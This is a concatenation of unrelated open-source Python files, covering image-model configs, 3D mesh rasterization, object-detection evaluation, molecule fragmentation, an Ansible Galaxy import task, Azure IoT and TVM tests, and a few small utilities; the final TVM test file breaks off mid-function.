"""
cfg = MLPMixerConfig(
name="resmlp_24_distilled_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-5,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_36_distilled_224():
"""
ResMLP-36
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_36_distilled_224",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=36,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-6,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_big_24_distilled_224():
"""
ResMLP-B-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_big_24_distilled_224",
url="[timm]",
patch_size=8,
embed_dim=768,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-6,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_big_24_224_in22ft1k():
"""
ResMLP-B-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
"""
cfg = MLPMixerConfig(
name="resmlp_big_24_224_in22ft1k",
url="[timm]",
patch_size=8,
embed_dim=768,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-6,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_12_224_dino():
"""
ResMLP-12
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
Model pretrained via DINO (self-supervised) - https://arxiv.org/abs/2104.14294
"""
cfg = MLPMixerConfig(
name="resmlp_12_224_dino",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=12,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def resmlp_24_224_dino():
"""
ResMLP-24
Paper: ResMLP: Feedforward networks for image classification...
Link: https://arxiv.org/abs/2105.03404
Model pretrained via DINO (self-supervised) - https://arxiv.org/abs/2104.14294
"""
cfg = MLPMixerConfig(
name="resmlp_24_224_dino",
url="[timm]",
patch_size=16,
embed_dim=384,
nb_blocks=24,
mlp_ratio=(4.0, 4.0),
block_layer="res_block",
init_values=1e-5,
norm_layer="affine",
mean=IMAGENET_DEFAULT_MEAN,
std=IMAGENET_DEFAULT_STD,
)
return MLPMixer, cfg
@register_model
def gmlp_ti16_224():
"""
gMLP-Tiny
Paper: Pay Attention to MLPs
Link: https://arxiv.org/abs/2105.08050
"""
cfg = MLPMixerConfig(
name="gmlp_ti16_224",
url="[timm]",
patch_size=16,
embed_dim=128,
nb_blocks=30,
mlp_ratio=(6.0, 6.0),
block_layer="spatial_gating_block",
mlp_layer="gated_mlp",
)
return MLPMixer, cfg
@register_model
def gmlp_s16_224():
"""
gMLP-Small
Paper: Pay Attention to MLPs
Link: https://arxiv.org/abs/2105.08050
"""
cfg = MLPMixerConfig(
name="gmlp_s16_224",
url="[timm]",
patch_size=16,
embed_dim=256,
nb_blocks=30,
mlp_ratio=(6.0, 6.0),
block_layer="spatial_gating_block",
mlp_layer="gated_mlp",
)
return MLPMixer, cfg
@register_model
def gmlp_b16_224():
"""
gMLP-Base
Paper: Pay Attention to MLPs
Link: https://arxiv.org/abs/2105.08050
"""
cfg = MLPMixerConfig(
name="gmlp_b16_224",
url="[timm]",
patch_size=16,
embed_dim=512,
nb_blocks=30,
mlp_ratio=(6.0, 6.0),
block_layer="spatial_gating_block",
mlp_layer="gated_mlp",
)
return MLPMixer, cfg
|
menpo3d/rasterize/base.py | apapaion/menpo3d | 134 | 11090395 | <gh_stars>100-1000
def rasterize_mesh_from_barycentric_coordinate_images(
mesh, bcoords_image, tri_indices_image
):
r"""
Renders an image of a `menpo.shape.TexturedTriMesh` or
`menpo.shape.ColouredTriMesh` from a barycentric coordinate image pair.
Note that the texture is rendered without any lighting model - think of
this as a piecewise affine warp of the mesh's texture into the image (
with z-buffering). As there is no lighting model, only meshes with
colour/texture can be used with this method (a single color for the whole
mesh would render flat with no shading).
Parameters
----------
mesh : `menpo.shape.TexturedTriMesh` or `menpo.shape.ColouredTriMesh`
        The 3D mesh whose texture will be rendered to the image.
bcoords_image : `menpo.image.MaskedImage`
The per-triangle barycentric coordinates for what should be rendered
into each pixel. See :map:`rasterize_barycentric_coordinate_images`.
tri_indices_image : `menpo.image.MaskedImage`
        The triangle index identifying the triangle that is visible at a pixel
after z-buffering. See :map:`rasterize_barycentric_coordinate_images`.
Returns
-------
`menpo.image.MaskedImage`
A rasterized image of the mesh.
"""
# Sample the mesh texture space to find the colors-per pixel
colours = mesh.sample_texture_with_barycentric_coordinates(
bcoords_image.as_vector(keep_channels=True).T, tri_indices_image.as_vector()
)
# Rebuild the image using the usual from_vector machinery
return tri_indices_image.from_vector(colours.T, n_channels=mesh.n_channels)
def rasterize_shape_image_from_barycentric_coordinate_images(
mesh, bcoords_image, tri_indices_image
):
r"""
Renders an XYZ shape image of a `menpo.shape.TexturedTriMesh` or
`menpo.shape.ColouredTriMesh` from a barycentric coordinate image pair.
Parameters
----------
mesh : `menpo.shape.TexturedTriMesh` or `menpo.shape.ColouredTriMesh`
        The 3D mesh whose texture will be rendered to the image.
bcoords_image : `menpo.image.MaskedImage`
The per-triangle barycentric coordinates for what should be rendered
into each pixel. See :map:`rasterize_barycentric_coordinate_images`.
tri_indices_image : `menpo.image.MaskedImage`
        The triangle index identifying the triangle that is visible at a pixel
after z-buffering. See :map:`rasterize_barycentric_coordinate_images`.
Returns
-------
`menpo.image.MaskedImage`
        A rasterized shape image of the mesh.
"""
# Sample the mesh texture space to find the colors-per pixel
shape_per_pixel = mesh.project_barycentric_coordinates(
bcoords_image.as_vector(keep_channels=True).T, tri_indices_image.as_vector()
)
# Rebuild the image using the usual from_vector machinery
return tri_indices_image.from_vector(
shape_per_pixel.points.T, n_channels=mesh.n_channels
)
def rasterize_mesh(mesh_in_img, image_shape):
from .cpu import rasterize_barycentric_coordinate_images
bcs = rasterize_barycentric_coordinate_images(mesh_in_img, image_shape)
return rasterize_mesh_from_barycentric_coordinate_images(mesh_in_img, *bcs)
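# Hypothetical usage sketch (illustrative only, not part of the original module; assumes
# a coloured mesh that has already been transformed into image coordinates):
#   from menpo.shape import ColouredTriMesh
#   mesh_in_img = ColouredTriMesh(points_in_image_space, trilist=trilist, colours=colours)
#   rendered = rasterize_mesh(mesh_in_img, image_shape=(480, 640))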
|
yolo/vedanet/engine/_voc_test.py | hilman-dayo/ObjectDetection-OneStageDet | 331 | 11090399 | <filename>yolo/vedanet/engine/_voc_test.py
import logging as log
import torch
from torchvision import transforms as tf
from statistics import mean
import os
from .. import data as vn_data
from .. import models
from . import engine
from utils.test import voc_wrapper
__all__ = ['VOCTest']
class CustomDataset(vn_data.BramboxDataset):
def __init__(self, hyper_params):
anno = hyper_params.testfile
root = hyper_params.data_root
network_size = hyper_params.network_size
labels = hyper_params.labels
lb = vn_data.transform.Letterbox(network_size)
it = tf.ToTensor()
img_tf = vn_data.transform.Compose([lb, it])
anno_tf = vn_data.transform.Compose([lb])
def identify(img_id):
return f'{img_id}'
super(CustomDataset, self).__init__('anno_pickle', anno, network_size, labels, identify, img_tf, anno_tf)
def __getitem__(self, index):
img, anno = super(CustomDataset, self).__getitem__(index)
for a in anno:
a.ignore = a.difficult # Mark difficult annotations as ignore for pr metric
return img, anno
def VOCTest(hyper_params):
log.debug('Creating network')
model_name = hyper_params.model_name
batch = hyper_params.batch
use_cuda = hyper_params.cuda
weights = hyper_params.weights
conf_thresh = hyper_params.conf_thresh
network_size = hyper_params.network_size
labels = hyper_params.labels
nworkers = hyper_params.nworkers
pin_mem = hyper_params.pin_mem
nms_thresh = hyper_params.nms_thresh
#prefix = hyper_params.prefix
results = hyper_params.results
test_args = {'conf_thresh': conf_thresh, 'network_size': network_size, 'labels': labels}
net = models.__dict__[model_name](hyper_params.classes, weights, train_flag=2, test_args=test_args)
net.eval()
log.info('Net structure\n%s' % net)
#import pdb
#pdb.set_trace()
if use_cuda:
net.cuda()
log.debug('Creating dataset')
loader = torch.utils.data.DataLoader(
CustomDataset(hyper_params),
batch_size = batch,
shuffle = False,
drop_last = False,
num_workers = nworkers if use_cuda else 0,
pin_memory = pin_mem if use_cuda else False,
collate_fn = vn_data.list_collate,
)
log.debug('Running network')
tot_loss = []
coord_loss = []
conf_loss = []
cls_loss = []
anno, det = {}, {}
num_det = 0
for idx, (data, box) in enumerate(loader):
if (idx + 1) % 20 == 0:
log.info('%d/%d' % (idx + 1, len(loader)))
if use_cuda:
data = data.cuda()
with torch.no_grad():
output, loss = net(data, box)
key_val = len(anno)
anno.update({loader.dataset.keys[key_val+k]: v for k,v in enumerate(box)})
det.update({loader.dataset.keys[key_val+k]: v for k,v in enumerate(output)})
netw, neth = network_size
reorg_dets = voc_wrapper.reorgDetection(det, netw, neth) #, prefix)
voc_wrapper.genResults(reorg_dets, results, nms_thresh)
|
datamol/fragment/_fragment.py | hengwei-chan/fragmentation_and_assemble | 130 | 11090408 | <filename>datamol/fragment/_fragment.py
from typing import Set
from typing import Optional
from typing import Any
from rdkit import Chem
from rdkit.Chem import BRICS
from rdkit.Chem import Recap
from rdkit.Chem import rdMMPA
from rdkit.Chem.Fraggle import FraggleSim
import datamol as dm
def brics(
mol: Chem.rdchem.Mol,
singlepass: bool = True,
remove_parent: bool = False,
sanitize: bool = True,
fix: bool = True,
):
"""Run BRICS on the molecules and potentially fix dummy atoms.
Args:
mol: a molecule.
singlepass: Single pass for `BRICSDecompose`.
remove_parent: Remove parent from the fragments.
        sanitize: Whether to sanitize the fragments.
        fix: Whether to fix the fragments.
"""
frags = BRICS.BRICSDecompose(mol, returnMols=True, singlePass=singlepass)
frags = list(frags)
if fix:
frags = [dm.fix_mol(x) for x in frags]
if sanitize:
frags = [dm.sanitize_mol(x) for x in frags]
if remove_parent:
frags.pop(0)
frags = [x for x in frags if x is not None]
return frags
def frag(
mol: Chem.rdchem.Mol,
remove_parent: bool = False,
sanitize: bool = True,
fix: bool = True,
):
"""Generate all possible fragmentation of a molecule.
Args:
mol: a molecule.
remove_parent: Remove parent from the fragments.
        sanitize: Whether to sanitize the fragments.
        fix: Whether to fix the fragments.
"""
frags = FraggleSim.generate_fraggle_fragmentation(mol)
smiles = set([])
for seq in frags:
smiles |= {s.strip() for s in seq.split(".")}
smiles = list(sorted(smiles, reverse=True))
frags = [dm.to_mol(s) for s in smiles]
if fix:
frags = [dm.fix_mol(x) for x in frags]
if sanitize:
frags = [dm.sanitize_mol(x) for x in frags]
frags = [x for x in frags if x is not None]
if remove_parent:
return frags
return [mol] + frags
def recap(
mol: Chem.rdchem.Mol,
remove_parent: bool = False,
sanitize: bool = True,
fix: bool = True,
):
"""Fragment the molecule using the recap algorithm.
Args:
mol: a molecule.
remove_parent: Remove parent from the fragments.
        sanitize: Whether to sanitize the fragments.
        fix: Whether to fix the fragments.
"""
res = Recap.RecapDecompose(mol)
frags = [dm.to_mol(x) for x in res.GetAllChildren().keys()]
if fix:
frags = [dm.fix_mol(x) for x in frags]
if sanitize:
frags = [dm.sanitize_mol(x) for x in frags]
frags = [x for x in frags if x is not None]
if remove_parent:
return frags
return [mol] + frags
def anybreak(
mol: Chem.rdchem.Mol,
remove_parent: bool = False,
sanitize: bool = True,
fix: bool = True,
):
"""Fragment molecule by applying brics first, then fall back to frag.
Args:
mol: a molecule.
remove_parent: Remove parent from the fragments.
        sanitize: Whether to sanitize the fragments.
        fix: Whether to fix the fragments.
"""
frags = []
try:
frags = brics(mol, fix=fix, remove_parent=remove_parent, sanitize=sanitize)
except:
pass
if len(frags) == 0:
frags = frag(mol, remove_parent=remove_parent, sanitize=sanitize, fix=fix)
return frags
def mmpa_frag(
mol,
    pattern: Optional[str] = None,
max_cut: int = 1,
max_bond_cut: int = 20,
h_split: bool = False,
) -> Optional[Set[Chem.Mol]]:
"""Fragment molecule on specific bonds suitable for a MMPA analysis.
Args:
mol: Molecule to fragment.
pattern: Bond pattern to split on. Will use default rdkit pattern
'[#6+0;!$(*=,#[!#6])]!@!=!#[*]' if not provided.
max_cut: Number of cuts.
        max_bond_cut: Maximum number of bonds to cut. Defaults to 20.
        h_split: Whether to also split at hydrogen positions.
This is equivalent to enabling the addition of new fragments.
Returns:
List of fragments
"""
frags = []
if pattern is None:
frags = rdMMPA.FragmentMol(
mol,
maxCuts=max_cut,
resultsAsMols=False,
maxCutBonds=max_bond_cut,
)
elif pattern:
frags = rdMMPA.FragmentMol(
mol,
pattern=pattern,
maxCuts=max_cut,
resultsAsMols=False,
maxCutBonds=max_bond_cut,
)
if h_split:
mol = Chem.AddHs(mol)
frags += rdMMPA.FragmentMol(
mol,
pattern="[#1]!@!=!#[!#1]",
maxCuts=1,
resultsAsMols=False,
maxCutBonds=max_bond_cut,
)
return set(frags)
def mmpa_cut(mol: Chem.rdchem.Mol, rdkit_pattern: bool = False) -> Optional[Set[Any]]:
"""Cut molecules to perform mmpa analysis later
Args:
mol: Molecule to fragment.
rdkit_pattern: Whether to perform the fragmentation
            using the default rdkit pattern: '[#6+0;!$(*=,#[!#6])]!@!=!#[*]'.
Returns:
List of 'smiles,core,chains'
"""
if mol is None:
return mol
outlines = set()
smiles = dm.to_smiles(mol)
if rdkit_pattern:
frags = mmpa_frag(mol, max_cut=3, max_bond_cut=30)
else:
# heavy atoms
frags = mmpa_frag(mol, pattern="[!#1]!@!=!#[!#1]", max_cut=4, max_bond_cut=30)
frags.update(mmpa_frag(mol, pattern="[!#1]!@!=!#[!#1]", max_cut=3, max_bond_cut=30))
frags = set(frags)
for core, chains in frags:
output = f"{smiles},{core},{chains}\n"
outlines.add(output)
# hydrogen splitting
mol = Chem.AddHs(mol)
smiles = dm.to_smiles(mol)
n = mol.GetNumHeavyAtoms()
if n < 60:
frags = mmpa_frag(mol, pattern=None, max_cut=1, max_bond_cut=100, h_split=True)
for core, chains in frags:
output = f"{smiles},{core},{chains}\n"
outlines.add(output)
return outlines
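if __name__ == "__main__":
    # Minimal smoke test of the fragmentation helpers above (illustrative only,
    # not part of the original module); the SMILES string is an arbitrary example.
    example = dm.to_mol("CC(=O)Oc1ccccc1C(=O)O")  # aspirin
    for f in brics(example, remove_parent=True):
        print(dm.to_smiles(f))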
|
galaxy/worker/tasks/collection.py | timblaktu/galaxy | 904 | 11090446 | # (c) 2012-2019, Ansible by Red Hat
#
# This file is part of Ansible Galaxy
#
# Ansible Galaxy is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by
# the Apache Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Ansible Galaxy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License
# along with Galaxy. If not, see <http://www.apache.org/licenses/>.
import logging
from django.db import transaction
from django.db.utils import IntegrityError
from galaxy_importer.collection import import_collection as process_collection
from galaxy_importer.collection import CollectionFilename
from galaxy_importer.exceptions import ImporterError
from pulpcore.app import models as pulp_models
import semantic_version as semver
from galaxy.main import models
from galaxy.main.celerytasks import user_notifications
from galaxy.worker import exceptions as exc
from galaxy.worker import logutils
from galaxy.worker.importers.collection import check_dependencies
log = logging.getLogger(__name__)
ARTIFACT_REL_PATH = '{namespace}-{name}-{version}.tar.gz'
CONTENT_TYPE_MAP = {
'role': 'role',
'module': 'module',
'module_utils': 'module_utils',
'action': 'action_plugin',
'become': 'become_plugin',
'cache': 'cache_plugin',
'callback': 'callback_plugin',
'cliconf': 'cliconf_plugin',
'connection': 'connection_plugin',
'doc_fragments': 'doc_fragments_plugin',
'filter': 'filter_plugin',
'httpapi': 'httpapi_plugin',
'inventory': 'inventory_plugin',
'lookup': 'lookup_plugin',
'netconf': 'netconf_plugin',
'shell': 'shell_plugin',
'strategy': 'strategy_plugin',
'terminal': 'terminal_plugin',
'test': 'test_plugin',
'vars': 'vars_plugin',
}
def import_collection(artifact_id, repository_id):
task = models.CollectionImport.current()
log.info(f'Starting collection import task: {task.id}')
artifact = pulp_models.Artifact.objects.get(pk=artifact_id)
repository = pulp_models.Repository.objects.get(pk=repository_id)
filename = CollectionFilename(
task.namespace.name, task.name, task.version)
task_logger = _get_task_logger(task)
task_logger.info(
f'Starting import: task_id={task.id}, artifact_id={artifact_id}')
try:
importer_data = _process_collection(artifact, filename, task_logger)
task_logger.info('Publishing collection')
version = _publish_collection(
task, artifact, repository, importer_data)
task_logger.info('Collection published')
except Exception as e:
task_logger.error(f'Import Task "{task.id}" failed: {e}')
user_notifications.collection_import.delay(task.id, has_failed=True)
artifact.delete()
raise
_notify_followers(version)
user_notifications.collection_import.delay(task.id, has_failed=False)
errors, warnings = task.get_message_stats()
task_logger.info(
f'Import completed with {warnings} warnings and {errors} errors')
def _get_task_logger(task):
logger = logging.getLogger('galaxy.worker.tasks.import_collection')
return logutils.ImportTaskAdapter(logger, task=task)
def _process_collection(artifact, filename, task_logger):
try:
with artifact.file.open() as artifact_file:
importer_data = process_collection(
artifact_file, filename=filename, logger=task_logger
)
except ImporterError as e:
        log.error(f'Collection processing was not successful: {e}')
raise
task_logger.info('Processing via galaxy-importer complete')
importer_data = _transform_importer_data(importer_data)
task_logger.info('Checking dependencies in importer data')
check_dependencies(importer_data['metadata']['dependencies'])
return importer_data
def _transform_importer_data(data):
"""Update data from galaxy_importer to match values in Community Galaxy."""
for c in data['contents']:
c['content_type'] = CONTENT_TYPE_MAP.get(
c['content_type'], c['content_type'])
c['scores'] = None
c['metadata'] = {}
c['role_meta'] = None
c['description'] = c['description'] or ''
return data
@transaction.atomic
def _publish_collection(task, artifact, repository, importer_data):
collection, _ = models.Collection.objects.get_or_create(
namespace=task.namespace, name=importer_data['metadata']['name'])
try:
version = collection.versions.create(
version=importer_data['metadata']['version'],
metadata=importer_data['metadata'],
quality_score=None,
contents=importer_data['contents'],
readme_mimetype='text/markdown',
readme_text='',
readme_html=importer_data['docs_blob']['collection_readme']['html']
)
except IntegrityError:
raise exc.VersionConflict(
'Collection version "{version}" already exists.'
.format(version=importer_data['metadata']['version']))
_update_latest_version(collection, version)
log.info('Updating collection tags')
_update_collection_tags(collection, version, importer_data['metadata'])
rel_path = ARTIFACT_REL_PATH.format(
namespace=importer_data['metadata']['namespace'],
name=importer_data['metadata']['name'],
version=importer_data['metadata']['version'])
pulp_models.ContentArtifact.objects.create(
artifact=artifact,
content=version,
relative_path=rel_path,
)
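    # Snapshot the repository: a new RepositoryVersion containing this collection version is
    # created, then exposed through a pass-through Publication and the 'galaxy' Distribution.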
with pulp_models.RepositoryVersion.create(repository) as new_version:
new_version.add_content(
pulp_models.Content.objects.filter(pk=version.pk)
)
publication = pulp_models.Publication.objects.create(
repository_version=new_version,
complete=True,
pass_through=True,
)
pulp_models.Distribution.objects.update_or_create(
name='galaxy',
base_path='galaxy',
defaults={'publication': publication},
)
task.imported_version = version
task.save()
return version
def _update_latest_version(collection, new_version):
latest_version = collection.latest_version
if latest_version is None or (semver.Version(latest_version.version)
< semver.Version(new_version.version)):
collection.latest_version = new_version
collection.save()
def _update_collection_tags(collection, version, metadata):
"""Update tags at collection-level, only if highest version."""
if collection.latest_version != version:
return
tags_not_in_db = [
{'name': tag, 'description': tag, 'active': True}
for tag in metadata['tags']
if models.Tag.objects.filter(name=tag).count() == 0]
models.Tag.objects.bulk_create([models.Tag(**t) for t in tags_not_in_db])
tags_qs = models.Tag.objects.filter(name__in=metadata['tags'])
collection.tags.add(*tags_qs)
tags_not_in_metadata = [
tag for tag in collection.tags.all()
if tag.name not in metadata['tags']
]
collection.tags.remove(*tags_not_in_metadata)
def _notify_followers(version):
user_notifications.collection_new_version.delay(version.pk)
is_first_version = (version.collection.versions.count() == 1)
if is_first_version:
user_notifications.coll_author_release.delay(version.pk)
|
tests/io/test_input_bounds.py | fracek/OMLT | 115 | 11090450 | <reponame>fracek/OMLT
import pytest
import tempfile
from omlt.io.input_bounds import write_input_bounds, load_input_bounds
def test_input_bounds_reader_writer_with_list():
input_bounds = [(i*10.0, i*10.0 + 1.0) for i in range(10)]
with tempfile.NamedTemporaryFile(suffix='.json', delete=False) as f:
write_input_bounds(f.name, input_bounds)
bounds_back = load_input_bounds(f.name)
for k, v in enumerate(input_bounds):
assert bounds_back[k] == v
def test_input_bounds_reader_writer_with_dictionary():
input_bounds = dict(
((i, i), (i*10.0, i*10.0 + 1.0))
for i in range(10)
)
with tempfile.NamedTemporaryFile(suffix='.json', delete=False) as f:
write_input_bounds(f.name, input_bounds)
bounds_back = load_input_bounds(f.name)
for k, v in input_bounds.items():
assert bounds_back[k] == v
|
amadeus/shopping/_hotel_offers_by_hotel.py | tsolakoua/amadeus-python | 125 | 11090452 | <reponame>tsolakoua/amadeus-python
from amadeus.client.decorator import Decorator
class HotelOffersByHotel(Decorator, object):
def get(self, **params):
'''
Get all offers for Holiday Inn Paris Notre Dame.
.. code-block:: python
amadeus.shopping.hotel_offers_by_hotel.get(hotelId='XKPARC12')
:param hotelId: Amadeus Property Code (8 chars), for
example ``XKPARC12``.
:rtype: amadeus.Response
:raises amadeus.ResponseError: if the request could not be completed
'''
return self.client.get('/v2/shopping/hotel-offers/by-hotel', **params)
|
cls/networks/__init__.py | megvii-model/MABN | 182 | 11090475 | from . import MABN
from . import resnet
|
py_feature/108_order_size.py | weiziyoung/instacart | 290 | 11090481 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 16 21:04:09 2017
@author: konodera
"""
import pandas as pd
import numpy as np
from tqdm import tqdm
import utils
utils.start(__file__)
#==============================================================================
# load
#==============================================================================
col = ['order_id', 'user_id', 'product_id', 'order_number', 'order_number_rev']
log = utils.read_pickles('../input/mk/log', col).sort_values('user_id')
#==============================================================================
# def
#==============================================================================
def make(T):
"""
T = 0
folder = 'trainT-0'
"""
if T==-1:
folder = 'test'
else:
folder = 'trainT-'+str(T)
log_ = log[log.order_number_rev>T]
order_tbl = log_.groupby('order_id').size().to_frame()
order_tbl.columns = ['order_size']
order_tbl.reset_index(inplace=True)
order_tbl = pd.merge(order_tbl, log_[['order_id', 'user_id']].drop_duplicates())
user_osz = order_tbl.groupby(['user_id']).order_size.min().to_frame()
user_osz.columns = ['user_order_size-min']
user_osz['user_order_size-max'] = order_tbl.groupby(['user_id']).order_size.max()
user_osz['user_order_size-median'] = order_tbl.groupby(['user_id']).order_size.median()
user_osz['user_order_size-mean'] = order_tbl.groupby(['user_id']).order_size.mean()
user_osz['user_order_size-std'] = order_tbl.groupby(['user_id']).order_size.std()
user_osz.reset_index(inplace=True)
user_osz.to_pickle('../feature/{}/f108_user.p'.format(folder))
#==============================================================================
# main
#==============================================================================
make(0)
make(1)
make(2)
make(-1)
utils.end(__file__)
|
device_e2e/aio/test_send_message.py | Azure/azure-iot-sdk-python | 366 | 11090484 | <gh_stars>100-1000
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
import asyncio
import pytest
import logging
import json
import uuid
from azure.iot.device.exceptions import OperationCancelled
logger = logging.getLogger(__name__)
logger.setLevel(level=logging.INFO)
pytestmark = pytest.mark.asyncio
@pytest.mark.describe("Client send_message method")
class TestSendMessage(object):
@pytest.mark.it("Can send a simple message")
@pytest.mark.quicktest_suite
async def test_send_message(self, client, random_message, service_helper):
await client.send_message(random_message)
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert event.system_properties["message-id"] == random_message.message_id
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Connects the transport if necessary")
@pytest.mark.quicktest_suite
async def test_connect_if_necessary(self, client, random_message, service_helper):
await client.disconnect()
assert not client.connected
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.dropped_connection
@pytest.mark.describe("Client send_message method with dropped connections")
class TestSendMessageDroppedConnection(object):
@pytest.fixture(scope="class")
def extra_client_kwargs(self):
return {"keep_alive": 5}
@pytest.mark.it("Sends if connection drops before sending")
@pytest.mark.uses_iptables
async def test_sends_if_drop_before_sending(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.drop_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
assert not send_task.done()
dropper.restore_all()
while not client.connected:
await asyncio.sleep(1)
await send_task
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
logger.info("sent from device= {}".format(random_message.data))
logger.info("received at eventhub = {}".format(event.message_body))
assert json.dumps(event.message_body) == random_message.data
logger.info("Success")
@pytest.mark.it("Sends if connection rejects send")
@pytest.mark.uses_iptables
async def test_sends_if_reject_before_sending(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.reject_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
assert not send_task.done()
dropper.restore_all()
while not client.connected:
await asyncio.sleep(1)
await send_task
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
logger.info("sent from device= {}".format(random_message.data))
logger.info("received at eventhub = {}".format(event.message_body))
assert json.dumps(event.message_body) == random_message.data
logger.info("Success")
@pytest.mark.describe("Client send_message with reconnect disabled")
class TestSendMessageRetryDisabled(object):
@pytest.fixture(scope="class")
def extra_client_kwargs(self):
return {"keep_alive": 5, "connection_retry": False}
@pytest.fixture(scope="function", autouse=True)
async def reconnect_after_test(self, dropper, client):
yield
dropper.restore_all()
await client.connect()
assert client.connected
@pytest.mark.it("Can send a simple message")
async def test_send_message(self, client, random_message, service_helper):
await client.send_message(random_message)
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Automatically connects if transport manually disconnected before sending")
async def test_connect_if_necessary(self, client, random_message, service_helper):
await client.disconnect()
assert not client.connected
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Automatically connects if transport automatically disconnected before sending")
@pytest.mark.uses_iptables
async def test_connects_after_automatic_disconnect(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.drop_outgoing()
while client.connected:
await asyncio.sleep(1)
assert not client.connected
dropper.restore_all()
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Fails if connection disconnects before sending")
@pytest.mark.uses_iptables
async def test_fails_if_disconnect_before_sending(self, client, random_message, dropper):
assert client.connected
dropper.drop_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
with pytest.raises(OperationCancelled):
await send_task
@pytest.mark.it("Fails if connection drops before sending")
@pytest.mark.uses_iptables
async def test_fails_if_drop_before_sending(self, client, random_message, dropper):
assert client.connected
dropper.drop_outgoing()
with pytest.raises(OperationCancelled):
await client.send_message(random_message)
assert not client.connected
|
tests/python/unittest/test_meta_schedule_schedule_rule_auto_bind.py | gayatripk1/tvm | 4,640 | 11090516 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=missing-module-docstring,missing-function-docstring,missing-class-docstring
from tvm.meta_schedule.space_generator.post_order_apply import PostOrderApply
from tvm.meta_schedule.testing.schedule_rule import auto_bind
from tvm.meta_schedule.testing.space_generation import check_trace
from tvm.meta_schedule.tune_context import TuneContext
from tvm.script import tir as T
from tvm.target import Target
@T.prim_func
def element_wise(var_A: T.handle, var_B: T.handle) -> None:
A = T.match_buffer(var_A, [512, 512], dtype="float32")
B = T.match_buffer(var_B, [512, 512], dtype="float32")
for i, j in T.grid(512, 512):
with T.block("C"):
vi, vj = T.axis.remap("SS", [i, j])
B[vi, vj] = A[vi, vj] + 1.0
@T.prim_func
def reduction_loop_only(
A: T.Buffer[2, "float32"],
B: T.Buffer[2, "float32"],
C: T.Buffer[(), "float32"],
) -> None:
for i0 in T.serial(2):
with T.block("C"):
k0 = T.axis.reduce(2, i0)
T.reads(A[k0], B[k0])
T.writes(C[()])
with T.init():
C[()] = T.float32(1.0)
C[()] = T.min(C[()], A[k0] / B[k0])
@T.prim_func
def zero_dim_add(
A: T.Buffer[(), "float32"],
B: T.Buffer[(), "float32"],
C: T.Buffer[(), "float32"],
) -> None:
with T.block("C"):
vi = T.axis.spatial(1, 0)
C[()] = A[()] + B[()]
def _create_context(mod, target, rule) -> TuneContext:
ctx = TuneContext(
mod=mod,
target=target,
space_generator=PostOrderApply(),
sch_rules=[rule],
task_name="test",
)
return ctx
def test_cuda_element_wise():
